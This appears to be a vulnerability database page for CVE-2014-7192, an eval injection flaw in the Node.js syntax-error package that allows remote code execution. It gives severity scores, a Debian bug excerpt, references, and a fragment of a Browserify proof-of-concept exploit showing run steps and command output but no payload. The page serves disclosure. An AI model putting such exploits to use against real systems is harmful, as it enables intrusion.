Published: 11/12/2014 Updated: 08/09/2017

CVSS v2 Base Score: 10 | Impact Score: 10 | Exploitability Score: 10

VMScore: 1000

Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C

Eval injection vulnerability in index.js in the syntax-error package prior to 1.1.1 for Node.js 0.10.x, as used in IBM Rational Application Developer and other products, allows remote malicious users to execute arbitrary code via a crafted file.

Vulnerable Product	Search on Vulmon	Subscribe to Product
joyent node.js

Debian Bug report logs - #773623 nodejs: CVE-2014-7192 Package: libv8-314; Maintainer for libv8-314 is Debian Javascript Maintainers <pkg-javascript-devel@listsaliothdebianorg>; Reported by: Michael Gilbert <mgilbert@debianorg> Date: Sun, 21 Dec 2014 03:09:02 UTC Severity: serious Tags: jessie-ignore, security, ...

#!/usr/bin/python """ Browserify POC exploit iopsio/blog/browserify-rce-vulnerability/ To run, just do: $ python pocpy > exploitjs $ browserify exploitjs BITCH I TOLD YOU THIS SHIT IS FABULOUS [[garbage output]] },{}]},{},[1]) 00:08:32 up 12:29, 3 users, load average: 000, 002, 005 uid=1001(foxx) gid=1001(foxx) groups=1001 ...

CWE-94 https://nodesecurity.io/advisories/syntax-error-potential-script-injection https://github.com/substack/node-syntax-error/commit/9aa4e66eb90ec595d2dba55e6f9c2dd9a668b309 http://www-01.ibm.com/support/docview.wss?uid=swg21690815 https://exchange.xforce.ibmcloud.com/vulnerabilities/96728 https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=773623 https://nvd.nist.gov https://www.exploit-db.com/exploits/34090/

CVE-2014-7192

Vulnerability Summary

Vendor Advisories

Exploits

References

Vulmon Search

About

Products

Connect